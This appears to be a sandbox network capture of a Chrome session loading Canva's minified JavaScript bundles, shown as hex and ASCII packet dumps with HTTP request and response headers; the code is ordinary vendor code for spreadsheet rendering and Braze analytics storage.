                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 62 5a 61 28 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 2c 6d 3d 50 38 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 56 6a 62 28 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 3b 72 65 74 75 72 6e 20 4c 38 28 52 38 2c 7b 2e 2e 2e 66 2c 73 63 61 6c 65 3a 67 2c 55 71 3a 6b 2c 55 5a 61 3a 6d 2c 56 52 61 3a 6c 2c 41 58 3a 62 7d 29 7d 29 3b 72 65 74 75 72 6e 7b 77 33 61 3a 63 2c 76 33 61 3a 64 2c 78 33 61 3a 65 7d 7d 2c 41 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 61 2e 48 76 2c 63
                                                                                                                                                                                                                                                                    Data Ascii: >null!=f.selection&&a.bZa(f.selection).has(n),[f.selection]),m=P8(n=>null!=f.selection&&a.Vjb(f.sheet,f.selection).has(n),[f.sheet,f.selection]);return L8(R8,{...f,scale:g,Uq:k,UZa:m,VRa:l,AX:b})});return{w3a:c,v3a:d,x3a:e}},AYc=function(a){const b=a.Hv,c
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 21 3d 62 2e 48 63 26 26 6e 75 6c 6c 21 3d 62 2e 4c 63 26 26 6e 75 6c 6c 21 3d 62 2e 6b 65 26 26 6e 75 6c 6c 21 3d 62 2e 4a 65 29 7b 76 61 72 20 63 3d 0a 61 2e 45 61 28 62 2e 48 63 29 2c 64 3d 61 2e 48 61 28 62 2e 4c 63 29 2c 65 3d 61 2e 45 61 28 62 2e 6b 65 29 2b 62 2e 6b 65 2e 77 69 64 74 68 2d 63 3b 61 3d 61 2e 48 61 28 62 2e 4a 65 29 2b 62 2e 4a 65 2e 68 65 69 67 68 74 2d 64 3b 72 65 74 75 72 6e 20 5f 5f 63 2e 6e 41 28 7b 74 6f 70 3a 64 2c 6c 65 66 74 3a 63 2c 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 61 7d 29 7d 7d 2c 4a 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 61 2e 48 76 2c 63 3d 28 29 3d 3e 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 64 3d 3e 4c 38 28 49 59 63 2c 7b 2e 2e 2e 64 2c 48 76 3a 62 2c 41 6e 3a 63 7d 29 7d 2c 4b 59
                                                                                                                                                                                                                                                                    Data Ascii: !=b.Hc&&null!=b.Lc&&null!=b.ke&&null!=b.Je){var c=a.Ea(b.Hc),d=a.Ha(b.Lc),e=a.Ea(b.ke)+b.ke.width-c;a=a.Ha(b.Je)+b.Je.height-d;return __c.nA({top:d,left:c,width:e,height:a})}},JYc=function(a){const b=a.Hv,c=()=>null;return d=>L8(IYc,{...d,Hv:b,An:c})},KY
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 29 29 3b 75 3d 41 28 6b 2e 67 65 74 28 76 2e 49 61 29 29 3b 72 3d 22 73 74 61 72 74 22 3d 3d 3d 72 2e 62 6f 75 6e 64 61 72 79 3f 71 2e 73 74 61 72 74 3a 71 2e 65 6e 64 3b 71 3d 43 2e 73 74 61 72 74 3b 76 3d 22 73 74 61 72 74 22 3d 3d 3d 76 2e 62 6f 75 6e 64 61 72 79 3f 75 2e 73 74 61 72 74 3a 75 2e 65 6e 64 3b 72 65 74 75 72 6e 7b 63 6f 6c 6f 72 3a 78 2c 77 65 69 67 68 74 3a 79 2c 43 63 3a 6e 2c 70 31 3a 6e 65 77 20 5f 5f 63 2e 48 6e 28 72 2c 71 2b 7a 29 2c 70 32 3a 6e 65 77 20 5f 5f 63 2e 48 6e 28 72 2c 76 2b 70 29 2c 2e 2e 2e 5f 5f 63 2e 48 42 28 76 2d 71 2c 6e 2a 79 2c 7a 29 7d 7d 7d 29 2e 66 69 6c 74 65 72 28 5f 5f 63 2e 65 62 29 2c 0a 2e 2e 2e 61 5d 7d 2c 52 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 5b 5d 3b 61 3d 61 2e 66
                                                                                                                                                                                                                                                                    Data Ascii: ));u=A(k.get(v.Ia));r="start"===r.boundary?q.start:q.end;q=C.start;v="start"===v.boundary?u.start:u.end;return{color:x,weight:y,Cc:n,p1:new __c.Hn(r,q+z),p2:new __c.Hn(r,v+p),...__c.HB(v-q,n*y,z)}}}).filter(__c.eb),...a]},RYc=function(a){const b=[];a=a.f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 67 29 68 3d 67 2e 6d 73 61 2c 68 3d 68 2e 63 6f 6c 75 6d 6e 3d 3d 3d 6c 2e 63 6f 6c 75 6d 6e 26 26 68 2e 62 6f 75 6e 64 61 72 79 3d 3d 3d 6c 2e 62 6f 75 6e 64 61 72 79 3b 68 26 26 28 68 3d 67 2e 42 59 61 2c 68 3d 68 2e 49 61 3d 3d 3d 6b 2e 49 61 26 26 68 2e 62 6f 75 6e 64 61 72 79 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 29 3b 68 26 26 67 2e 63 6f 6c 6f 72 3d 3d 3d 63 2e 63 6f 6c 6f 72 26 26 67 2e 77 65 69 67 68 74 3d 3d 3d 63 2e 77 65 69 67 68 74 26 26 67 2e 43 63 3d 3d 3d 63 2e 43 63 26 26 30 3d 3d 3d 67 2e 43 63 3f 67 2e 6d 73 61 3d 66 3a 65 2e 70 75 73 68 28 7b 42 59 61 3a 6b 2c 64 79 62 3a 6c 2c 6d 73 61 3a 66 2c 63 6f 6c 6f 72 3a 63 2e 63 6f 6c 6f 72 2c 77 65 69 67 68 74 3a 63 2e 77 65 69 67 68 74 2c 43 63 3a 63 2e 43 63 7d 29 7d 7d 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                    Data Ascii: g)h=g.msa,h=h.column===l.column&&h.boundary===l.boundary;h&&(h=g.BYa,h=h.Ia===k.Ia&&h.boundary===k.boundary);h&&g.color===c.color&&g.weight===c.weight&&g.Cc===c.Cc&&0===g.Cc?g.msa=f:e.push({BYa:k,dyb:l,msa:f,color:c.color,weight:c.weight,Cc:c.Cc})}}return
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 61 79 6f 75 74 2e 72 6f 77 73 2e 6e 65 78 74 28 64 5b 64 2e 6c 65 6e 67 74 68 2d 0a 31 5d 2e 49 61 29 29 26 26 65 2e 70 75 73 68 28 7b 49 61 3a 64 2c 62 6f 75 6e 64 61 72 79 3a 22 73 74 61 72 74 22 7d 29 3b 66 6f 72 28 63 6f 6e 73 74 20 71 20 6f 66 20 68 29 7b 68 3d 28 64 3d 22 73 74 61 72 74 22 3d 3d 3d 71 2e 62 6f 75 6e 64 61 72 79 3f 71 2e 63 6f 6c 75 6d 6e 3a 76 6f 69 64 20 30 29 3f 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6a 65 28 64 29 3a 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6c 61 73 74 28 29 3b 66 6f 72 28 63 6f 6e 73 74 20 72 20 6f 66 20 65 29 7b 76 61 72 20 6c 3d 22 73 74 61 72 74 22 3d 3d 3d 72 2e 62 6f 75 6e 64 61 72 79 3f 72 2e 49 61 3a 76 6f 69 64 20 30 3b 6b 3d 6c 3f 62 2e 6c 61 79 6f 75 74 2e 72 6f 77 73 2e 6a 65 28 6c 29 3a 62 2e 6c
                                                                                                                                                                                                                                                                    Data Ascii: ayout.rows.next(d[d.length-1].Ia))&&e.push({Ia:d,boundary:"start"});for(const q of h){h=(d="start"===q.boundary?q.column:void 0)?b.layout.cols.je(d):b.layout.cols.last();for(const r of e){var l="start"===r.boundary?r.Ia:void 0;k=l?b.layout.rows.je(l):b.l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 76 6f 69 64 20 30 3a 61 3a 62 3b 61 3d 5f 5f 63 2e 46 42 28 62 2e 62 6f 72 64 65 72 53 74 79 6c 65 2c 61 2e 62 6f 72 64 65 72 53 74 79 6c 65 2c 64 2c 63 2c 65 2c 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 66 2e 62 6f 72 64 65 72 53 74 79 6c 65 29 7d 72 65 74 75 72 6e 20 61 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 66 3d 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 62 6f 72 64 65 72 53 74 79 6c 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 0a 66 3f 66 3a 6e 75 6c 6c 3d 3d 3d 62 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 62 6f 72 64 65 72 53 74 79 6c 65 7d 2c 55 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3b 63 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: void 0:a:b;a=__c.FB(b.borderStyle,a.borderStyle,d,c,e,null===f||void 0===f?void 0:f.borderStyle)}return a}return null!==(f=null===a||void 0===a?void 0:a.borderStyle)&&void 0!==f?f:null===b||void 0===b?void 0:b.borderStyle},UYc=function(a,b,c,d){var e;con


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    104192.168.2.1249832104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1256OUTGET /web/f0398d1166314304.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 115121
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951494a988c90-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1926293
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "cb1826af86c8190ceb1ff4f70e255c6d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 23 Oct 2024 01:12:53 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 24 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: obf24c+YF9xXl/rmhD6WRszPq8SrqjFdUfGDh+41/JP3UlzybS/ZPUFJWgnDtmbusdkllCfDi2s=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: BTKRNYJWXEZQPM2Y
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 9Gmf.e8cCdjPD0iyMK2k7YgD6MdjsLKJ
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 65 53 58 57 67 33 53 59 7a 38 74 6e 56 70 67 58 7a 5a 39 78 64 6f 35 41 6e 47 58 56 4f 76 65 78 38 58 4b 59 73 6d 64 72 6f 79 76 76 7a 34 42 53 48 66 4b 4f 76 63 25 32 42 53 46 39 4f 69 46 25 32 46 75 4d 67 42 38 35 31 79 44 35 70 36 49 34 7a 47 6a 46 66 53 45 68 61 77 59 52 49 63 54 30 6a 63 4f 70 30 46 46 6c 54 6b 6f 62 25 32 46 54 48 6f 67 57 48 7a 4b 45 61 37 77 77 4d 25 32 42 4f 71 58 76 75 47 6d 65 37 70 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eSXWg3SYz8tnVpgXzZ9xdo5AnGXVOvex8XKYsmdroyvvz4BSHfKOvc%2BSF9OiF%2FuMgB851yD5p6I4zGjFfSEhawYRIcT0jcOp0FFlTkob%2FTHogWHzKEa7wwM%2BOqXvuGme7pY%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1193INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 33 36 5d 2c 7b 38 39 39 31 37 31 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 63 6f 6e 73 74 20 73 3d 7b 54 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 28 74 2b 22 3d 22 2e 72 65 70 65 61 74 28 28 34 2d 74 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29 2c 69 3d 61 74 6f 62 28 65 29 2c 73 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 69 2e 6c
                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 70 6f 72 74 20 54 65 73 74 22 29 3b 69 66 28 65 26 26 28 65 2e 6f 6e 75 70 67 72 61 64 65 6e 65 65 64 65 64 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 2c 65 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2c 65 3d 74 2e 63 68 72 6f 6d 65 7c 7c 74 2e 62 72 6f 77 73 65 72 7c 7c 74 2e 70 64 3b 69 66 28 65 26 26 65 2e 72 75 6e 74 69 6d 65 26 26 65 2e 72 75 6e 74 69 6d 65 2e 69 64 29 72 65 74 75 72 6e 20 74 68 69 73 2e 76 64 2e 69 6e 66 6f 28 22 4e 6f 74 20 75 73 69 6e 67 20 49 6e 64 65 78 65 64 44 42 20 66 6f 72 20 73 74 6f 72 61 67 65 20 62 65 63 61 75 73 65 20 77
                                                                                                                                                                                                                                                                    Data Ascii: port Test");if(e&&(e.onupgradeneeded=()=>e.result.close(),e.onsuccess=()=>e.result.close()),"undefined"!=typeof window){const t=window,e=t.chrome||t.browser||t.pd;if(e&&e.runtime&&e.runtime.id)return this.vd.info("Not using IndexedDB for storage because w
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 2e 69 73 53 75 70 70 6f 72 74 65 64 28 29 29 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 28 29 2c 21 31 3b 63 6f 6e 73 74 20 72 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 64 28 28 6f 3d 3e 7b 69 66 28 21 6f 2e 6f 62 6a 65 63 74 53 74 6f 72 65 4e 61 6d 65 73 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 20 72 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 73 74 6f 72 65 20 6f 62 6a 65 63 74 20 22 2b 65 2b 22 20 69 6e 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 72 2e 64 61 74 61 62 61 73 65 2e 53 64 2b 22 20 2d 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 6f 62 6a 65 63 74 53 74 6f 72 65 22 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                                                                                                                                                                                                                                                                    Data Ascii: .isSupported())return"function"==typeof n&&n(),!1;const r=this;return this.Bd((o=>{if(!o.objectStoreNames.contains(t))return r.vd.error("Could not store object "+e+" in "+t+" on indexedDB "+r.database.Sd+" - "+t+" is not a valid objectStore"),"function"==
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 29 2c 76 6f 69 64 20 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 72 3d 6e 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 74 5d 2c 22 72 65 61 64 6f 6e 6c 79 22 29 3b 72 2e 6f 6e 63 6f 6d 70 6c 65 74 65 3d 28 29 3d 3e 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 6f 3d 72 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 74 29 2e 6f 70 65 6e 43 75 72 73 6f 72 28 6e 75 6c 6c 2c 22 70 72 65 76 22 29 3b 6f 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 7b 73 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 73 2e 64 61 74 61 62 61 73 65 2e 53 64 29 2c 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                    Data Ascii: ,"function"==typeof i&&i(),void n.close();const r=n.transaction([t],"readonly");r.oncomplete=()=>n.close();const o=r.objectStore(t).openCursor(null,"prev");o.onerror=()=>{s.vd.error("Could not open cursor for "+t+" on indexedDB "+s.database.Sd),"function"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 69 2e 64 61 74 61 62 61 73 65 2e 53 64 29 7d 2c 6f 2e 6f 6e 73 75 63 63 65 73 73 3d 74 3d 3e 7b 76 61 72 20 69 3b 63 6f 6e 73 74 20 73 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 2e 74 61 72 67 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 72 65 73 75 6c 74 3b 6e 75 6c 6c 21 3d 73 3f 28 6e 75 6c 6c 21 3d 73 2e 76 61 6c 75 65 26 26 6e 75 6c 6c 21 3d 73 2e 6b 65 79 26 26 28 72 2e 64 65 6c 65 74 65 28 73 2e 6b 65 79 29 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 7b 61 2e 70 75 73 68 28 73 2e 76 61 6c 75 65 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 63 6f 6e 74 69 6e 75 65 26 26
                                                                                                                                                                                                                                                                    Data Ascii: d not open cursor for "+t+" on indexedDB "+i.database.Sd)},o.onsuccess=t=>{var i;const s=null===(i=t.target)||void 0===i?void 0:i.result;null!=s?(null!=s.value&&null!=s.key&&(r.delete(s.key).onsuccess=()=>{a.push(s.value)}),"function"==typeof s.continue&&
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 6f 67 67 6c 65 4c 6f 67 67 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 69 6e 69 74 28 29 2c 73 2e 7a 67 3f 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 44 69 73 61 62 6c 69 6e 67 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 31 29 3a 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 45 6e 61 62 6c 65 64 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 30 29 7d 2c 69 6e 66 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65 3a 20 22 2b 74 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 2c 77 61 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61
                                                                                                                                                                                                                                                                    Data Ascii: oggleLogging:function(){s.init(),s.zg?(console.log("Disabling Braze logging"),s.zg=!1):(console.log("Enabled Braze logging"),s.zg=!0)},info:function(t){if(s.zg){const e="Braze: "+t;null!=s.vd?s.vd(e):console.log(e)}},warn:function(t){if(s.zg){const e="Bra
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 2c 6e 2e 45 29 28 74 29 3e 6f 2e 5a 2e 6c 72 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 65 72 72 6f 72 28 60 52 65 6a 65 63 74 65 64 20 75 73 65 72 20 69 64 20 22 24 7b 74 7d 22 20 62 65 63 61 75 73 65 20 69 74 20 69 73 20 6c 6f 6e 67 65 72 20 74 68 61 6e 20 24 7b 6f 2e 5a 2e 6c 72 7d 20 62 79 74 65 73 2e 60 29 3b 69 66 28 6e 75 6c 6c 21 3d 65 26 26 21 28 30 2c 61 2e 72 6f 29 28 65 2c 22 73 65 74 20 73 69 67 6e 61 74 75 72 65 20 66 6f 72 20 6e 65 77 20 75 73 65 72 22 2c 22 73 69 67 6e 61 74 75 72 65 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 73 2e 5a 50 2e 63 72 28 29 3b 69 26 26 69 2e 63 68 61 6e 67 65 55 73 65 72 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 2c 73 2e 5a 50 2e 67 72 28 29 2c 65 29 7d 7d 2c 31 39 35 30 38 38 3a 28 74 2c 65 2c
                                                                                                                                                                                                                                                                    Data Ascii: ,n.E)(t)>o.Z.lr)return void r.Z.error(`Rejected user id "${t}" because it is longer than ${o.Z.lr} bytes.`);if(null!=e&&!(0,a.ro)(e,"set signature for new user","signature"))return;const i=s.ZP.cr();i&&i.changeUser(t.toString(),s.ZP.gr(),e)}},195088:(t,e,
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 33 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 6f 6e 73 74 20 74 3d 73 2e 5a 50 2e 6c 28 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 77 61 72 6e 28 61 2e 47 6f 29 3b 74 2e 63 6c 65 61 72 44 61 74 61 28 29 3b 63 6f 6e 73 74 20 65 3d 28 30 2c 6e 2e 58 50 29 28 6f 2e 5a 2e 59 74 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 65 5b 69 5d 2c 73 3d 6f 2e 5a 2e 59 74 5b 74 5d 3b 6e 65 77 20 6f 2e 5a 28 73 2c 72 2e 5a 29 2e 63 6c 65 61 72 44 61 74 61 28 29 7d 69 66 28 73 2e 5a 50 2e 58 28 29 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 73 2e 5a 50 2e 67 72 28 29 29 69 2e 63 6c 65 61 72 44 61 74 61 28 21 30 29 7d 7d 2c 38 34 32 34 31 37 3a 28 74 2c
                                                                                                                                                                                                                                                                    Data Ascii: 3);function u(){const t=s.ZP.l();if(null==t)return void r.Z.warn(a.Go);t.clearData();const e=(0,n.XP)(o.Z.Yt);for(let i=0;i<e.length;i++){const t=e[i],s=o.Z.Yt[t];new o.Z(s,r.Z).clearData()}if(s.ZP.X())for(const i of s.ZP.gr())i.clearData(!0)}},842417:(t,
